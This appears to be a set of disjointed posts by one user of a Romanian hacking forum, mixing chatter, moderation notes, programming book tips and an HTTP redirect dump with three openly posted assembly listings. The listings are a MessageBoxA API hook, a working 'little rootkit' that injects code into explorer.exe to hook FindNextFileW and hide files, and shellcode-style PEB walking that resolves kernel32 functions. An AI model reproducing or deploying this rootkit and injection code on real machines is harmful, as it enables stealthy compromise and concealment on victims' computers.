Nytro

Probabil keyloggerul folosea keyboard hook si nu anticul GetAsyncKeyState.

In ziua de azi nu poti scrie un program de 2 linii de cod, deoarece acestea sunt folosite si de tot felul de pseudo-virusi care sunt detectati de toti pseudo-antivirusii. Daca cineva crede ca acest programel e infectat sau face cine stie de tampenie (desi nu vad ce ar putea face) e liber sa analizeze programul, sa il dezasambleze, orice.

Nicolae Guta - Leii grei

Arhitectura calculatorului (sau sistemelor de calcul) - Adrian Atanasiu, Ed. Infodata Programarea procesoarelor Intel (parca) - Vasile Lungu, Ed. Teora

Cel mai bine se invata din carti, dar sunt si tutoriale bune. Eu fac ASM la facultate (la Arhitectura Sistemelor de Calcul - Universitatea Bucuresti, Informatica).

Credits: Alan Website: Ellicit.org .486 .MODEL FLAT, STDCALL OPTION CASEMAP:NONE INCLUDE C:\masm32\include\windows.inc INCLUDE C:\masm32\include\kernel32.inc INCLUDE C:\masm32\include\user32.inc INCLUDELIB C:\masm32\lib\kernel32.lib INCLUDELIB C:\masm32\lib\user32.lib .DATA LibName DB 'user32.dll', 0 APIName DB 'MessageBoxA', 0 .DATA? OgMessageBoxA DD ? .CODE HookAPI PROC Origin:DWORD, Destination:DWORD, CodeLength:DWORD LOCAL Protection:DWORD PUSH ESI PUSH EDI INVOKE VirtualProtect, Origin, CodeLength, PAGE_READWRITE, ADDR Protection MOV EAX, CodeLength ADD EAX, 5h INVOKE VirtualAlloc, NULL, EAX, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE PUSH EAX MOV EDI, EAX MOV ESI, Origin MOV ECX, CodeLength REP MOVSB MOV BYTE PTR [EDI], 0E9h MOV ECX, Origin SUB ECX, EAX SUB ECX, 5h MOV [EDI + 1h], ECX MOV EDI, Origin MOV BYTE PTR [EDI], 0E9h MOV ECX, Destination SUB ECX, Origin SUB ECX, 5h MOV [EDI + 1h], ECX INVOKE VirtualProtect, Origin, CodeLength, Protection, ADDR Protection POP EAX POP EDI POP ESI RET HookAPI ENDP HkMessageBoxA PROC hWnd:DWORD, lpText:DWORD, lpCaption:DWORD, uType:DWORD .IF uType == NULL ;If user application provides NULL/MB_OK we will give them a nice icon too PUSH MB_ICONEXCLAMATION .ELSE PUSH uType .ENDIF PUSH lpCaption PUSH lpText PUSH hWnd CALL OgMessageBoxA ;EAX holds result we could change it here if we wished before returning to the user application RET HkMessageBoxA ENDP ENTRY: INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL ;Non hooked MessageBoxA works as programmer made it INVOKE LoadLibraryA, OFFSET LibName INVOKE GetProcAddress, EAX, OFFSET APIName INVOKE HookAPI, EAX, OFFSET HkMessageBoxA, 0Bh MOV OgMessageBoxA, EAX ;Remember to save the offset for the hooked function to call the original INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL ;Hooked MessageBoxA with our evil icon adding patch INVOKE ExitProcess, NULL END ENTRY COMMENT ^ Win2000SP4.USER32!MessageBoxA 77E38098 > 55 PUSH EBP 77E38099 8BEC MOV EBP,ESP 77E3809B 51 PUSH ECX 77E3809C 833D 3892E677 00 CMP DWORD PTR DS:[77E69238],0 ^

Author: EON - Hi, this code hook the FindNextFileW api to hide all the files that begin with "~". Change the pid for the pid of explorer.exe to saw the effect. ; ******************************************************* ; *** Example of a little rootkit that hide all the *** ; *** files that begin with "~" without use Dll. *** ; *** *** ; *** By E0N (L) 2008 *** ; ******************************************************* include 'H:\archivos de programa\fasm\include\win32ax.inc' .data HookApi db 'FindNextFileW' , 0 ; Name of the api to hook HookDll db 'Kernel32.dll' , 0 ; Name of the DLL that contain it DirApi dd ? ; Direction of the api to hook process dd ? pid dd 2160 ; PID of the process to hook x dd 7 ; Number of bytes that have the api at begin BufferCall dd ? ; Buffer to call the api api (in our process) inyBufferCall dd ? ; Pointer to the buffer to call the api when injected tamFun dd ? ; Size of function that will replace the api inyFun dd ? ; Pointer to this buffer when injected BufferApi dd ? ; 5 bytes buffer for replace the begin of api struct Datos sBufferCall dd ? ; Pointer to inyBufferCall to can call the original api ends dat Datos ? SizeofDatos dd 4 dirStruct dd ? ; Pointer to structure when injected Prote dd ? ; To call VirtualProtect .code start: ; Get handle of process when we will inject mov eax, PROCESS_VM_OPERATION or eax, PROCESS_VM_WRITE invoke OpenProcess, eax, FALSE, [pid] mov [process], eax ; Get direction of api to Hook invoke GetModuleHandle, HookDll invoke GetProcAddress, eax, HookApi mov [DirApi], eax ; Make the buffer to call the api: ; x bytes | 1 byte | 4 byte | 1 byte ; x first bytes of api | push [0x68] | DirApi + x | ret [0xC3] mov eax, dword [x] add eax, 6 invoke LocalAlloc, LPTR, eax ; eax = x + 6 mov [BufferCall], eax invoke RtlMoveMemory, [BufferCall], [DirApi], [x] ; Copiamos los x primeros bytes del api mov eax, [BufferCall] add eax, [x] mov byte [eax], 0x68 inc eax mov ebx, [DirApi] add ebx, [x] mov dword [eax], ebx add eax, 4 mov byte [eax], 0xC3 ; Inject this buffer mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT mov ecx, [x] ; ecx = x + 6 add ecx, 6 invoke VirtualAllocEx, [process], 0, ecx, eax, PAGE_READWRITE mov [inyBufferCall], eax mov ebx, [x] ; ebx = x + 6 add ebx, 6 invoke WriteProcessMemory, [process], [inyBufferCall], [BufferCall], ebx, NULL ; Initialize the structure mov eax, [inyBufferCall] ; Metemos el puntero al buffer para llamar mov [dat.sBufferCall], eax ; con normalidad al api ; Inject structure mov eax, MEM_RESERVE or eax, MEM_COMMIT invoke VirtualAllocEx, [process], 0, [SizeofDatos], eax, PAGE_READWRITE mov [dirStruct], eax invoke WriteProcessMemory, [process], [dirStruct], dat, [SizeofDatos], NULL ; Change the 0x0000 for a pointer to the structure mov ebx, CAMBIO ; ebx = El 0x0000 que hay que cambiar (4 bytes) sub ebx, 4 invoke VirtualProtect, ebx, 6, PAGE_EXECUTE_READWRITE, Prote invoke RtlMoveMemory, ebx, dirStruct, 4 ; Calculate the size of the function to inject mov eax, FIN_MyFindNextFileW sub eax, MyFindNextFileW mov [tamFun], eax ; Inject the function mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT invoke VirtualAllocEx, [process], 0, [tamFun], eax, PAGE_EXECUTE_READWRITE mov [inyFun], eax invoke WriteProcessMemory, [process], [inyFun], MyFindNextFileW, [tamFun], NULL ; Make a buffer to hook the api ; 1 bytes | 4 bytes ; jmp [0xE9] | Size of jump invoke LocalAlloc, LPTR, 5 mov [BufferApi], eax mov byte [eax], 0xE9 inc eax mov ebx, [inyFun] sub ebx, [DirApi] sub ebx, 5 ; 5 = -1 por el 0xE9 y -4 por la dirección mov dword [eax], ebx ; Inject this buffer in the begin of api mov eax, MEM_RESERVE ; eax = MEM_RESERVE | MEM_COMMIT or eax, MEM_COMMIT invoke VirtualAllocEx, [process], [DirApi], 5, eax, PAGE_EXECUTE_READWRITE invoke WriteProcessMemory, [process], [DirApi], [BufferApi], 5, NULL invoke ExitProcess, 0 ; Funtion that will replace the api proc MyFindNextFileW hFindFile, lpFindFileData OK: mov ebx, 0x0000 ; This 0x0000 will do a pointer to the buffer before inject CAMBIO: push [lpFindFileData] push [hFindFile] call dword [ebx] mov ebx, eax cmp ebx, 0 je RETORNAR_FIN mov eax, [lpFindFileData] ; add eax, 44 cmp byte [eax], '~' je OK mov eax, 1 ret RETORNAR_FIN: mov eax, 0 ret endp FIN_MyFindNextFileW: .end start In conclusion, is a little-rootkit without dll.

Credits : HUTCH pour la fonction StringCompare PHRACK pour le tips pour récuperer K32 Reference : NEITSA pour la méthodo Author: steve10120 call .hwndDelta .hwndDelta: pop ebp sub ebp, .hwndDelta .find_kernel: mov eax, [fs:30h] ;EAX = PEB base mov eax, [eax + 0ch] ;EAX = PEB_LDR_DATA mov esi, [eax + 1ch] ;first entry in InInitializationOrderModuleList lodsd ;forward to next LIST_ENTRY mov ebx, [eax + 08h] ;EBX = Kernel32 base memory mov [ebp + _kernelBase], ebx mov esi, dword[ebx + 3Ch] ;ESI = PE MAGIC add esi, [ebp + _kernelBase] mov edx, [esi + 078h] ;EDX = RVA table export add edx, [ebp + _kernelBase] ;EDX = VA table export mov ecx, [edx + 018h] ;ECX = nombre d'export de la DLL mov [ebp + _function_nb], ecx mov ebx, [edx + 020h] ;EBX = VA du pointeur de nom add ebx, 4 add ebx, [ebp + _kernelBase] ;EBX = VA table export ;A partir de la on a tous les éléments pour rechercher les fonctions ;Recuperation de GetProcAddress pushad lea edi, [ebp + _szGetProcAddress] ;EDI = GetProcAddress string call .find_function mov [ebp + _getProcAddress], eax popad ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;Recuperation de LoadLibrary pushad lea edi, [ebp + _szLoadLibrary] ;EDI = GetProcAddress string call .find_function mov [ebp + _loadLibrary], eax popad ;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;TEST MESSAGEBOX ; lea ebx,[ebp +_szUser32] push ebx call [ebp +_loadLibrary] ; lea ebx,[ebp +_szMessageBox] push ebx push eax lea edx, [ebp +_getProcAddress] call dword[edx] ; push 0 lea esi, [ebp +_szGetProcAddress] push esi lea edi, [ebp +_szGetProcAddress] push edi push 0 call eax ;;;;;;;;;;;;;;;; ret .find_function: .find_function_loop: mov esi, dword[ebx] ;ESI = RVA STRING FUNC add ebx, 4 add esi, [ebp + _kernelBase] ;EBX = VA STRING FUNC dec ecx ;ECX = ECX - 1 call .stringCompare cmp eax, -1 je .find_function_loop mov ebx, [edx + 01ch] ; ebx = export table address RVA add ebx, [ebp + _kernelBase] ; pointeur vers table d'export mov edx, dword[_function_nb] sub edx, ecx imul edx, edx, 4 add ebx, edx mov eax, ebx mov eax, dword[eax] add eax, [ebp + _kernelBase] ret .stringCompare: pushad mov ecx, esi mov edx, edi .cmst: mov al, [ecx] cmp al, [edx] jne .no_match add ecx, 1 add edx, 1 test al, al jne .cmst popad xor eax, eax ret .no_match: popad mov eax, -1 ret _szGetProcAddress db "GetProcAddress",0 _szLoadLibrary db "LoadLibraryA",0 _kernelBase dd ? _function_nb dd ? _szMessageBox db "MessageBoxA",0 _szUser32 db "user32.dll",0 _getProcAddress dd ? _loadLibrary dd ?

Nu dai si tu de baut? :->

Da, utilizatori (useri) porno.

Da, tipic. Windu: O sa vezi multe astfel de comentarii, sugestia mea e sa nu le iei in seama.

Voi chiar ati descarcat ce a postat? Dupa ce v-a spus ce contine?

Unde a fost? Putea sa participe oricine?

Topic de cacat. Au rezultat 8 avertismente care au dus la cateva banuri. Se muta la gunoi.

Binary Code Modification [Patching Vulnerabilities] Download: http://www.securityarchitect.org/binary-english.pdf

Dragut, toate posturile nu au nici o legatura cu acel program, deci toate au primit warn. Si au rezultat 3 banuri. In caz ca nu ati observat, am revenit

Daca ai nevoie de ajutor faci un topic si incerc sa te ajut. Dar cred ca o sa gasesti tot ce ai nevoie in articolele de pe acel site.

C/C++, sockets si multe altele: http://www.tenouk.com/

Da, aceea e adresa la care te redirectioneaza. Multe site-uri fac redirectionari, nu e ceva nou, unic si inovativ. Numai ca e nevoie sa iti scrie asa ceva la URL ca sa iti dai seama.

Ce anume? Ca te redirectioneaza la un link lung? O amarata de linie de cod. HTTP/1.1 302 Found Connection: close Date: Fri, 22 Oct 2010 19:32:30 GMT Location: You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/Ass Server: Apache/2.2.9 (Debian) PHP/5.2.14-0.dotdeb.0 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Client-Date: Fri, 22 Oct 2010 19:32:30 GMT Client-Peer: 81.20.136.200:80 Client-Response-Num: 1 Client-Warning: Redirect loop detected (max_redirect = 7) X-Powered-By: PHP/5.2.14-0.dotdeb.0 Headerele HTTP. Un Location...

Pe Linux folosesti compilatoarele de la GNU: gcc si g++. Atentie, daca esti obisnuit sa lucrezi cu Borland C o sa fie nevoie de niste schimbari, limbajul nu mai e chiar ca acum 20 de ani pe vremea cand a aparut acel compilator. Pe Windows folosesti CodeBlocks sau DevC++. Compilatorul folosit de ambele de MinGW, portarea pe Windows a compilatoarelor GNU. Citeste cu antetie mesajele de eroare, sau avertismentele si cauta-le pe Google daca nu intelegi ce vor sa spuna.

Topicul asta e spam

Thanks. Vacanta de RST ("locul meu de munca, sau cum e acum la moda: job") Sunt ocupat cu mutarea in Bucuresti. Care e din Bucuresti si vrea sa dea 3-4 beri sa dea un PM, poate o sa mai intru. Bafta, sa fiti cuminti

Dupa cum ati vazut, de cateva zile nu am mai intrat, si un timp nu o sa mai intru, sper ca nu foarte mult. Adica un timp o sa scapati de mine. Dar voi reveni eu...

Din fericire noi nu avem de ce sa ne facem griji, daca e trenul la 200 de metri poti bea linistit doua beri pana ajunge.